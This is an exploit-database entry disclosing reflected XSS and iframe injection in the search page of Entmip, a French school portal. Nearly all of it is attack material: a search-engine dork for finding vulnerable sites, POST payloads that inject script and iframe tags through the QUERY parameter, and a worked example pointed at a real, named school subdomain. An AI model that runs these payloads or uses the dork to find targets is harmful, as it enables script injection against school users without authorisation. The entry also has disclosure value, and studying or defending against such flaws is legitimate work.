Entmip Reflected XSS & Iframe injection

2016.12.19
us Implosion (US) us
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

---------------------------------------------------------------------- [Description] #Exploit title: Entmip Reflected XSS & Iframe injection #Exploit author: Implosion #Date: 18/12/2016 #Dorks: site:.entmip.fr -site:www.xxx.com #Website: entmip.fr #Tested on: Firefox ---------------------------------------------------------------------- [Vulnerability][Reflected XSS] #URL: http://XXXXXX.entmip.fr/sg.do #POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=XXXX&QUERY="><script>alert('1')</script>+&x=0&y=0 ---------------------------------------------------------------------- [Vulnerability][Iframe Injection] #URL: http://XXXXXX.entmip.fr/sg.do #POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=XXXX&QUERY="><iframe src=https://cxsecurity.com>+&x=0&y=0 ---------------------------------------------------------------------- [Example] #URL: http://labarousse.entmip.fr/sg.do #POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=6469&QUERY="><script>alert('1')</script>%2B&x=0&y=0 ---------------------------------------------------------------------- #Discovered By Implosion ----------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top